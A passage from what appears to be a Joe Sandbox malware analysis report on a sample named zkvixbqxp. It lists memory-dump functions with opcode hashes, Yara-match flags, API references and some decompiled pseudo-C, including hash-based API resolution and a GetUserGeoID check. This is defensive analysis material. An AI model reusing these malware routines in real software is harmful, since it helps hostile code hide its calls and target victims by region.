                                                            • Instruction Fuzzy Hash: 18D01772604214BBD610EBA9DC89FD77BADEF48664F018469BA1C5B642C570FA0086E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A398F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                            • Instruction ID: 805eb357daac78acba7b1ddbc40b622d27022bec3dc3e7796499cd02f3b6cb89
                                                            • Opcode Fuzzy Hash: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                            • Instruction Fuzzy Hash: 2290026570100502D24171694444616000A97D0381F91C032A1014595ECA658992F171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 028da423b9d82a95cf7fca0aa8ca6cc8c618ffc768bca60d803f029dcdfd4f5b
                                                            • Instruction ID: 290410979948eddf751ed96be0d59bbe9f7c9c0565da778d33a26746ad25b457
                                                            • Opcode Fuzzy Hash: 028da423b9d82a95cf7fca0aa8ca6cc8c618ffc768bca60d803f029dcdfd4f5b
                                                            • Instruction Fuzzy Hash: 6B90027530100413D25161694544707000997D0381F91C422A0414598D96968952F161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1555c7641540a3f0e030e2e107353c7545897e333335aff0200793f3eb503c55
                                                            • Instruction ID: 7a6ea18da0d73e6da52ca4e08fb13e9e7e56090b0ef09c7d7c8c64ccb55d1192
                                                            • Opcode Fuzzy Hash: 1555c7641540a3f0e030e2e107353c7545897e333335aff0200793f3eb503c55
                                                            • Instruction Fuzzy Hash: 4A900265342041525685B16944445074006A7E0381791C022A1404990C85669856E661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A399A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e4a9fb299502241d8144f084072f6df997d099a131642f60c6fec483d58d63c2
                                                            • Instruction ID: ff24f4abbd72a8d7703755405a9cda36a8a422549103b8ddb48c5b9a763ccb58
                                                            • Opcode Fuzzy Hash: e4a9fb299502241d8144f084072f6df997d099a131642f60c6fec483d58d63c2
                                                            • Instruction Fuzzy Hash: 8B9002A534100442D24061694454B060005D7E1341F51C025E1054594D8659CC52B166
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 18427c37b5ff7e1b3d8e402d5ff5799f8c344e782c155a0840cc3387f263d261
                                                            • Instruction ID: 976f5f5dc5f2cd058fdeac6afae7e8ec698f0d5c89e797fa08b8b9b9a9726a3b
                                                            • Opcode Fuzzy Hash: 18427c37b5ff7e1b3d8e402d5ff5799f8c344e782c155a0840cc3387f263d261
                                                            • Instruction Fuzzy Hash: FD9002B530100402D28071694444746000597D0341F51C021A5054594E86998DD5B6A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bb84c18376172076e6b01768eee83769259a3a6e093ea94d2d367d31a260a7d2
                                                            • Instruction ID: 35683e20c30727a0a50fc25648d66be4b9b2993e0307e13ab0f028c6786be61e
                                                            • Opcode Fuzzy Hash: bb84c18376172076e6b01768eee83769259a3a6e093ea94d2d367d31a260a7d2
                                                            • Instruction Fuzzy Hash: D9900265701000424280717988849064005BBE1351751C131A0988590D85998865A6A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bd272313a4561b97e2a77293f6db5bdc7a4b62172856c1a4098c1703b8bc000d
                                                            • Instruction ID: 4d16e4e1629a1a56c2317ffb855e97b8f64b08cd8628e7821d6db24834b5c9a2
                                                            • Opcode Fuzzy Hash: bd272313a4561b97e2a77293f6db5bdc7a4b62172856c1a4098c1703b8bc000d
                                                            • Instruction Fuzzy Hash: 2C90027530140402D2406169485470B000597D0342F51C021A1154595D86658851B5B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4e3d1e98a75bca62e5ae7a4f5b524b109a05bd2496f3ad2131cc676b585179b5
                                                            • Instruction ID: 812e6f905eebff400b6be02b975a221363fb6cee4f5648d97503e7878f394828
                                                            • Opcode Fuzzy Hash: 4e3d1e98a75bca62e5ae7a4f5b524b109a05bd2496f3ad2131cc676b585179b5
                                                            • Instruction Fuzzy Hash: 9890026531180042D34065794C54B07000597D0343F51C125A0144594CC9558861A561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A395D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0f4a14d6060ab2811462594daf324f98d5976ef906b1a9f8aa2b13295fd088cf
                                                            • Instruction ID: a3edbfe77da89c07e5fb030969613d01f659f65a11952e03f46687cacc7e653a
                                                            • Opcode Fuzzy Hash: 0f4a14d6060ab2811462594daf324f98d5976ef906b1a9f8aa2b13295fd088cf
                                                            • Instruction Fuzzy Hash: 009002A530200003424571694454616400A97E0341B51C031E10045D0DC5658891B165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bd446603fb89dd626b31d5463174b9b28d0d46e461bfa250f1b8d567112fc072
                                                            • Instruction ID: 687352a623d9e066b8c2b643d0514c80faffe5799998153e74c69c6723f3b198
                                                            • Opcode Fuzzy Hash: bd446603fb89dd626b31d5463174b9b28d0d46e461bfa250f1b8d567112fc072
                                                            • Instruction Fuzzy Hash: 93900269311000030245A5690744507004697D5391351C031F1005590CD6618861A161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A396E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 68deefb8cdb356388787f6e0e543e2e76e14638a67440e8a0f8c8b498ad2c80a
                                                            • Instruction ID: 5a1472c76643623322109f0822fd9a9ea389bac6edfb4363c2587dd174e8273d
                                                            • Opcode Fuzzy Hash: 68deefb8cdb356388787f6e0e543e2e76e14638a67440e8a0f8c8b498ad2c80a
                                                            • Instruction Fuzzy Hash: F890027530108802D2506169844474A000597D0341F55C421A4414698D86D58891B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 580ee2e1aa0067b88385bb63b0b71c315acf281c68f247aa332ddb2ed6f99b0b
                                                            • Instruction ID: 30b23d690dc791b41255fc54d8e042908643adc7cf5a9ca76368522f370fbd6b
                                                            • Opcode Fuzzy Hash: 580ee2e1aa0067b88385bb63b0b71c315acf281c68f247aa332ddb2ed6f99b0b
                                                            • Instruction Fuzzy Hash: 5E90027530100802D2C07169444464A000597D1341F91C025A0015694DCA558A59B7E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A397A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 156d475072d643d29f3f5845004dcd741e4b9e82ede64e99d19ddb5fe58444f6
                                                            • Instruction ID: 67ce5d888483575511ab0db52cbad6eb4907d561215664751a5737bb9d1ed066
                                                            • Opcode Fuzzy Hash: 156d475072d643d29f3f5845004dcd741e4b9e82ede64e99d19ddb5fe58444f6
                                                            • Instruction Fuzzy Hash: 1A90026530100003D280716954586064005E7E1341F51D021E0404594CD9558856A262
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d59f73717d0c3bc636959420a85b0aa802ea82b70ab852b4d867c886878cebfb
                                                            • Instruction ID: b29a32a5fdac0b2223fed188fbadd1c9ca00218e6fa01a6dd5c9928f5bd57660
                                                            • Opcode Fuzzy Hash: d59f73717d0c3bc636959420a85b0aa802ea82b70ab852b4d867c886878cebfb
                                                            • Instruction Fuzzy Hash: 4B90026D31300002D2C07169544860A000597D1342F91D425A0005598CC9558869A361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 094985bdb95072362cd5b18895af614c1f1615059a9ef30a5da40f967c787146
                                                            • Instruction ID: 43586842f2aa834978b880b07414075b7d718f259dd00ce781edbd503d2792d2
                                                            • Opcode Fuzzy Hash: 094985bdb95072362cd5b18895af614c1f1615059a9ef30a5da40f967c787146
                                                            • Instruction Fuzzy Hash: 2190027531114402D25061698444706000597D1341F51C421A0814598D86D58891B162
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e8e6a39b8260d8261727141a88f256a51463264420a4ad83b8929b50e9296de1
                                                            • Instruction ID: dc8af70368fabf69d6828f4a3e3b0569679aecfa83ec2d23925cb6a9165dd5f1
                                                            • Opcode Fuzzy Hash: e8e6a39b8260d8261727141a88f256a51463264420a4ad83b8929b50e9296de1
                                                            • Instruction Fuzzy Hash: 4590027530100402D24065A95448646000597E0341F51D021A5014595EC6A58891B171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040DCB4 Relevance: .2, Instructions: 213COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6735715c33e0f5900508609589f523574fc87d132aba90311dea84a4ac42b7db
                                                            • Instruction ID: 2c629dfb8b80f07489c97dcf184b86cf59ff6b74f806cc09c031a315a2475121
                                                            • Opcode Fuzzy Hash: 6735715c33e0f5900508609589f523574fc87d132aba90311dea84a4ac42b7db
                                                            • Instruction Fuzzy Hash: FA6148B1D046289FDB10DFA5DC81AEF77B8EF45304F4401AEE408A7141EB799E46CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004098BC Relevance: 1.6, APIs: 1, Instructions: 63threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 111 4098bc-4098d4 112 4098dd-409917 call 420c03 call 40cf43 call 402e53 call 419553 111->112 113 4098d8 call 420163 111->113 122 409950-409956 112->122 123 409919-40992a PostThreadMessageW 112->123 113->112 123->122 124 40992c-40994d call 40c613 123->124 124->122
                                                            C-Code - Quality: 76%
                                                            			E004098BC(void* __eax, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t16;
				int _t18;
				long _t31;
				int _t34;
				void* _t37;
				void* _t39;
				void* _t44;

				_t44 = __eax -  *((intOrPtr*)(__eax - 0x4f));
				_t37 = _t39;
				_push(0x55aae438);
				_v68 = 0;
				E00420163( &_v67, 0, 0x3f);
				E00420C03( &_v68, 3);
				_t22 = _a4;
				_t16 = E0040CF43(_t44, _a4 + 0x20,  &_v68); // executed
				_t18 = E00419553(_a4 + 0x20, _t16, 0, 0, E00402E53(0x987b2170));
				_t34 = _t18;
				if(_t34 != 0) {
					_t31 = _a8;
					_t18 = PostThreadMessageW(_t31, 0x111, 0, 0); // executed
					if(_t18 == 0) {
						_t18 =  *_t34(_t31, 0x8003, _t37 + (E0040C613(1, 8, _t22 + 0x884) & 0x000000ff) - 0x40, _t18);
					}
				}
				return _t18;
			}












                                                            0x004098bc
                                                            0x004098c4
                                                            0x004098c9
                                                            0x004098d4
                                                            0x004098d8
                                                            0x004098e3
                                                            0x004098e8
                                                            0x004098f3
                                                            0x0040990b
                                                            0x00409910
                                                            0x00409917
                                                            0x00409919
                                                            0x00409926
                                                            0x0040992a
                                                            0x0040994e
                                                            0x0040994e
                                                            0x0040992a
                                                            0x00409956

                                                            APIs
                                                            • PostThreadMessageW.USER32(000030DF,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409926
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: 02b377b8155b6763f8e600d6daca9bc5beabba54061841012be32f76a870478e
                                                            • Instruction ID: fcd993cc6d1a733398719f35f0280be16b01ecc62254b66b856764c646ee8f35
                                                            • Opcode Fuzzy Hash: 02b377b8155b6763f8e600d6daca9bc5beabba54061841012be32f76a870478e
                                                            • Instruction Fuzzy Hash: 6F11C872A402157BE720A695DC82FAF776C9B44B44F44412DFF04BB2C2D6A8AE0583E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004098C3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 84%
                                                            			E004098C3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420163( &_v67, 0, 0x3f);
				E00420C03( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF43(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419553(_a4 + 0x20, _t13, 0, 0, E00402E53(0x987b2170));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C613(1, 8, _t19 + 0x884) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                            0x004098c3
                                                            0x004098d4
                                                            0x004098d8
                                                            0x004098e3
                                                            0x004098e8
                                                            0x004098f3
                                                            0x0040990b
                                                            0x00409910
                                                            0x00409917
                                                            0x00409919
                                                            0x00409926
                                                            0x0040992a
                                                            0x00000000
                                                            0x0040994e
                                                            0x0040992a
                                                            0x00409956

                                                            APIs
                                                            • PostThreadMessageW.USER32(000030DF,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409926
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: c8afd3c7f82155ffec076d7c5c7bbf8f0bc26e0f65edd62f314378a29830e86b
                                                            • Instruction ID: 43d5e70f63f4c5382cf88fe4c11c3766e8f12ce393aa0dafb307e6f3d78d8bd5
                                                            • Opcode Fuzzy Hash: c8afd3c7f82155ffec076d7c5c7bbf8f0bc26e0f65edd62f314378a29830e86b
                                                            • Instruction Fuzzy Hash: 1A019B72A4021976E721A6959C82FEF776C9B40B54F14412DFF047A1C2D6A86D0543E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E7CB Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 173 41e7cb-41e7cd 174 41e803-41e81a call 41f193 173->174 175 41e7cf-41e7d1 173->175 177 41e81f-41e834 RtlAllocateHeap 174->177 175->174
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00418C19,?,004193B0,004193B0,?,00418C19,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E830
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction ID: d7f273ee16de7898e1738b7ece0aee8d8e366c2e9b1e2ee52fb53ba4aa615557
                                                            • Opcode Fuzzy Hash: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction Fuzzy Hash: 05E039B5200214BBC714DE5ACC45E973B6DEF85664F118055FD099B241C130E904CAF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E843 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 204 41e843-41e874 call 41f193 RtlFreeHeap
                                                            C-Code - Quality: 79%
                                                            			E0041E843(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				asm("in al, dx");
				_t7 = _a4;
				_t3 = _t7 + 0xaa0; // 0xaa0
				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                            0x0041e845
                                                            0x0041e846
                                                            0x0041e852
                                                            0x0041e85a
                                                            0x0041e870
                                                            0x0041e874

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 0041E870
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction ID: 721e4973953a84db4dcddf94a1e1433d710c653feace7435bf47e9ee9c7b7d5b
                                                            • Opcode Fuzzy Hash: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction Fuzzy Hash: 4DE012B1200208ABCB14EF89DC49EA737ADAF88754F018469BA095B282C630E914CAF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E803 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 201 41e803-41e834 call 41f193 RtlAllocateHeap
                                                            C-Code - Quality: 100%
                                                            			E0041E803(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                            0x0041e812
                                                            0x0041e81a
                                                            0x0041e830
                                                            0x0041e834

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00418C19,?,004193B0,004193B0,?,00418C19,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E830
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction ID: 1e3ab82d362c24e98813a00aa952a333a9cd0421c58b75dc5d1474d2b11c7bf2
                                                            • Opcode Fuzzy Hash: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction Fuzzy Hash: EDE012B2200208ABCB14EF89DC45EA737ADAF88664F018469BA085B242C630F9148AF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410093 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 178 410093-4100ac 179 4100b2-4100b7 178->179 180 4100ad call 419553 178->180 181 4100b9-41011d call 420163 call 40d413 call 40ffa3 179->181 182 4100bb-4100cc GetUserGeoID 179->182 180->179 189 410122-41012a 181->189 190 410144-410146 189->190 191 41012c-41012e 189->191 192 410158-41015e 190->192 193 410148-41014c 190->193 194 410130-410137 call 41e663 191->194 195 41013a-410143 191->195 193->192 197 41014e-410155 call 41e663 193->197 194->195 197->192
                                                            C-Code - Quality: 37%
                                                            			E00410093(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419553(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                            0x004100ad
                                                            0x004100b7
                                                            0x004100bd
                                                            0x004100cc
                                                            0x004100ba
                                                            0x004100ba
                                                            0x004100ba

                                                            APIs
                                                            • GetUserGeoID.KERNELBASE(00000010), ref: 004100BD
                                                            Memory Dump Source
